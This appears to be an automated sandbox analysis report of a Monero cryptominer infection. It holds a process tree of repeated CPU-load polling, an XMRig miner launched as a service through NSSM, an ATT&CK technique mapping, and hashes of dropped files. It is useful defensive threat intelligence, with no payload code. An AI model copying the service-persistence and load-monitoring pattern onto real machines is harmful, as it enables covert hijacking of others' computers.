- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4716
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3240
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:948
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1056
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2536
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:216
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4344
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1052
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4176
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1280
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2884
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3900
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2760
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2904
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3208
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4384
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1604
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4940
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3084
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1796
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2700
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4156
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4268
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4900
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:848
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3528
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1324
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4948
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2408
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1720
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1048
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2460
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2544
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1732
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4944
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3120
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1392
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3536
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2836
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4632
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:600
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3556
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2136
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3588
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4460
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:512
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4272
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3496
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:816
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3648
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1784
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4924
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:96
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:380
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:196
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5056
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1484
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4344
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:656
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4176
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2900
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2708
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2668
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4992
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2608
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4304
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3248
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2784
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3092
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1928
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2144
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3992
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2768

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:4028
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4548

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6670e81ccdbe4db79a1301a1e3fc2cb7

SHA1
116d03c90fe423ade3254b99b63dbbf5620188e8

SHA256
413bec53ce44456ffba8d31be3396ae8f69344cbf03a4909478b08f2005bd7f0

SHA512
e6a9150d309d1ed6d4c358c58f7c1d3739fe562d1d2e98c520d30d13fe09130c179f0da778b218d2146e99b3fa703c66d5298da409a55134c25c94841378bee1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9c0354662ab562d0d6b1cb9c6364d5ff

SHA1
5e9767fe559f040692761fe1c777010cafa8cc25

SHA256
5def885454e20849e0788dc0fd22fbfd723baf53f5c0f6eefdb739ced25b5909

SHA512
8d63b2c0c82df1d23165bc2be793e11b06da979cf26875e38c842cab12c80e6473cb9e927d32c312e9eef596c196055841b72ff13e4e7791dc0c599312a6d57e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e4f1d182ca639a4370f260c520f64f04

SHA1
c2ba892670e54b8dc151301de39077ede3b279a8

SHA256
69342d001c5dc4eefe2fd88f5007fae6773c45a0513ae55496fedfa57dd1e8a9

SHA512
38a643f4a0c7ed71a69384b88e7e5112fbbd3b242b908ff444bb137da4f17bab35af6249442a449869fec638cde4665fefa3bde328e0e8e52f61e14d5a308853

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1eab08c8cc5670eab21bfaf24aa46720

SHA1
68c24847fc55891ad70edd8e30e71170c5a6cf87

SHA256
73c91c582082f0cd733808c6678d385b3d2e1041216e63750b0c2d80d296fab3

SHA512
a2e7eeedb54ee5866a889d5a4b71a572a14de91e267e88ea83de16e196e44e0ac3fbe9167f4b8bc9c91a96b886e32ca04e348765e1d7177a1e33a14c686530a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
757b6ce3146f0d940c4505a5c020979c

SHA1
7e1e5d237998242de489f78e89d9756d561f364a

SHA256
8af7b5604f7652252b2500990bf821a3e8eeceb33c87c5b9fae0a33c6cfa38b8

SHA512
e64b8a01dfce1fd6badd5e40997c3a6b58f47ca9ac0954211e8d44f0b1a065dc7f04b1f7e305a1eafdd2ecc125370a241438d4ae690b62a23555f6d38f700aaf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ff7e21917e78322863062e6405aac238

SHA1
e424fc413a5f8dd5eb29f9969082b6f2f2dbec88

SHA256
33eb0080cea01abad85f91699b39835e8773a3c58e0b8df136044a717f64228b

SHA512
2dfd2fec00118e940c7e8c4b95387167ef9ad5ce37edc4b984a1367a8bc4c13b70fe6f39fb618092d96af4a4b0c6883a70c6101214dabb40d88f3d2c8b3e0410

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7784db64adc95c6a1b1ba0eeb4fad066

SHA1
ab6bef1ab93aed058a19c14647ff10cda8e85ab9

SHA256
6c1312609f11884e5040d1c6885dd62f7d8caab2609caa5412d771a7aefbff9f

SHA512
699b0c2b303746d8c83a6047265988e4b22fe5b833453d6f9c519dcec8bab5fa22c6404ad3bbaf8ef570bea6d2326de69322820ad39cda58ffafae7ed4377d49

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
28fd8ca9ebefc8cddcf20476b3ee9fb6

SHA1
11a7643e00864e6082e828e53803e7388ae7b1df

SHA256
6fbea037a2d9cc3aa1c69727d2d3f453afbb284da4e708295ed351f10f9ade84

SHA512
8ab61c278c6e9c22e43f0f9cf6574e8a9537e0df56f2a172d2e80c3a3e27a3e1e19d71c8644b1dfd4b6e54ded637bf4e5d00b57ae7b7d9ced325d3300b85040a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
03bffa242a011a4a32021bcddfd00d45

SHA1
cf2266289d1ced95dd047713e55be41fe7003386

SHA256
7a920dc5d3449b5abb70665bec9abc31903dc22f867003aa95a2f6bb6c22d18f

SHA512
d77040d70cfc1a9eb6eff98667f31e1a688f846d47856f880786910674bc47bd399e7ad60de9b3dc6e56100e1304dcca6935516a72ec76d4ad9e697a78297cfa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ad403a91d3b7f7704a456fa8cf8f7461

SHA1
4bcef8d901fe1aa61683964bba5e613054604904

SHA256
def1272f1b5836eee8e464f5a0121fb506fb6df47188e89b0a7efadd776f4045

SHA512
28e75dba40d0081426bede2dc5eeba645beffee72d5a66049fbef397a47317aecf35f8f65adba1f7b3e853a79ba7ecf8b6ef24f01893a49efc5fda1f6d3a75b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
36e595bf36d4c8abe9abed05e421b453

SHA1
747a7994da38ad048c7a62e8a8ad95950eeb4f2c

SHA256
d048c972a85d9f32f3ecf3f9bf4c04c89c747734c20ad77346380ff443e334ff

SHA512
11282791d80b592f4d61bacecd88a17b42d35a3d923d6acbfff0a36318ba884d706a9c4f3284b4db52209175c7d0e06090c7358f15f248f051e98a923c4fc483

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9109641c1e3251f1e71055db144fe6ae

SHA1
ed570f621265813b741cb3691e4e19b15ec930ed

SHA256
a7e507385b626de88426d03e341f73dbc7d52ab3053d20af73e223d0850ec68c

SHA512
f385eaff71e3ce761b16402085a884706dd52a3ebc5fc5d40dc122b7a17290ea2f68a6518d4c08dcc34f9be90927dda75ce4f95928a807d83ecaf67fa9034a5e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v40xnrpm.fj5.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpE3C8.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
67099c11aee7715195c370daf8713cf6

SHA1
4ffe1365749d5828225c3c91efbf37524f6b4574

SHA256
91a469ac7711ea2098eeed42b648548c51a109b83fd54fac53b643a4d9f127c8

SHA512
4a4351749e0a6dfb211196af3eb892486c3df501ec6923cad96c16605e40cca3febaf908ece586e36a55b2945141140c18c0359badd0d609999aed747221145b

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
e3b9b22db047eeacf220bc3b9c7f4eb2

SHA1
3b32a79bfde5b7860537e969a65c9ce854794efb

SHA256
5ef97aec367578d4ef6954f09f3ad4db6bb92d74dd08db7452c9e7bda32327d4

SHA512
0f9f534bcf09077b826fee22bfcdb24cdef734ab10f903687107b28b28c2e45cfa72655ae5716561a4b2aade574595a373f27df380792aa7bec3281056ab7d27

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
a95317d05f94f08d17bd77cda0988c08

SHA1
90eee1a7ac3be0828fba575b1c9632efc4842564

SHA256
ebe2ea08e88891c1195ac7d3a425582ed3bce8d5c3f20bfda043352cf3626a00

SHA512
958795d47d5351b82406b8d4444b483025aa2b8e4a9505e1aa49b7674f1fb0c10fde40325d1cf706f3c3303368777b1a7d9af919893416bb367f7a8d3286afbf

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
12d25779840bba866f4d71347a07eab7

SHA1
ac6c036155c882c695d1cdcb2b654de79b9e7bfa

SHA256
5c75ad14dc7bb90d38fc1812a02da90332708612e95681ba2cd0effc740f062f

SHA512
5973a1b1bbafb7bdcae7ac93610c63ae34f48aa42bf174441171041d25e23db60b80fba1f79faedafca27f11037e07881975c3f8ace2a3091c06cab8b9ca6dfc

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
88508a886b6fa68d53ea89c3f39d40cc

SHA1
1e85cf0db0b30289bb737843665d459013396029

SHA256
f468ef658728172768c1253db8d93eafc21bfd72d8bbdf3676e9f40e8e4f99b5

SHA512
deae44719d1d59709d99408d625aaaf9858aedb18d553b080531a3c2d728b59629c2fbed7b7dbb252e427918264905855858b1020ef588a85f359ae0aa759761

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/756-130-0x00000000001D0000-0x00000000001F0000-memory.dmp

Filesize
128KB

Download
memory/756-131-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/1140-5-0x00007FFCC5640000-0x00007FFCC581B000-memory.dmp

Filesize
1.9MB

Download
memory/1140-3-0x00007FFCC5640000-0x00007FFCC581B000-memory.dmp

Filesize
1.9MB

Download
memory/1140-25-0x00007FFCC5640000-0x00007FFCC581B000-memory.dmp

Filesize
1.9MB

Download
memory/1140-7-0x00000294CBA40000-0x00000294CBA62000-memory.dmp

Filesize
136KB

Download
memory/1140-10-0x00000294CBBF0000-0x00000294CBC66000-memory.dmp

Filesize
472KB

Download
memory/1140-6-0x00007FFCC5640000-0x00007FFCC581B000-memory.dmp

Filesize
1.9MB

Download
memory/1140-412-0x00007FFCC5640000-0x00007FFCC581B000-memory.dmp

Filesize
1.9MB

Download
memory/2668-88-0x0000017A7C230000-0x0000017A7C242000-memory.dmp

Filesize
72KB

Download
memory/2668-87-0x0000017A7BFE0000-0x0000017A7BFEA000-memory.dmp

Filesize
40KB

Download
memory/4548-424-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-444-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-415-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-416-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-417-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-418-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-419-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-420-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-421-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-422-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-423-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-413-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-425-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-426-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-427-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-428-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-429-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-430-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-431-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-432-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-433-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-434-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-435-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-436-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-437-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-438-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-439-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-440-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-441-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-442-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-443-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-414-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-445-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-446-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-447-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4548-448-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
